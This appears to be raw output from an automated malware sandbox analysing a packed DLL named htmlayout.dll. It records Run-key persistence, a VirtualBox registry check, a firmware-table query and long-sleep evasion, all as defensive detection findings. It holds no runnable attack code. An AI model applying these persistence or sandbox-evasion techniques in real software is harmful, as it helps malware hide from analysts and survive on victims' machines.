Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: htmlayout.dllStatic PE information: More than 208 > 100 exports found
Source: htmlayout.dllStatic file information: File size 20644864 > 1048576
Source: htmlayout.dllStatic PE information: Raw size of is bigger than: 0x100000 < 0x162800
Source: htmlayout.dllStatic PE information: Raw size of is bigger than: 0x100000 < 0x358800
Source: htmlayout.dllStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0xeb3600
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B7238C push 04B72443h; ret 3_2_04B7243B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0485C508 push ecx; mov dword ptr [esp], edx3_2_0485C509
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047A71C4 push ecx; mov dword ptr [esp], ecx3_2_047A71C7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047C1A9C push ecx; mov dword ptr [esp], eax3_2_047C1A9D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047C4680 push ecx; mov dword ptr [esp], eax3_2_047C4681
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047A5B64 push ecx; mov dword ptr [esp], ecx3_2_047A5B68
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B7238C push 04B72443h; ret 5_2_04B7243B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0485C508 push ecx; mov dword ptr [esp], edx5_2_0485C509
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_047A71C4 push ecx; mov dword ptr [esp], ecx5_2_047A71C7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_047C1A9C push ecx; mov dword ptr [esp], eax5_2_047C1A9D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_047C4680 push ecx; mov dword ptr [esp], eax5_2_047C4681
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_047A5B64 push ecx; mov dword ptr [esp], ecx5_2_047A5B68
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name: .themida
Source: htmlayout.dllStatic PE information: section name: .boot
Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
Source: initial sampleStatic PE information: section name: entropy: 7.905526374226113

Boot Survival

barindex
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exeJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\loaddll32.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\loaddll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 9964 delay: -10Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9964Jump to behavior
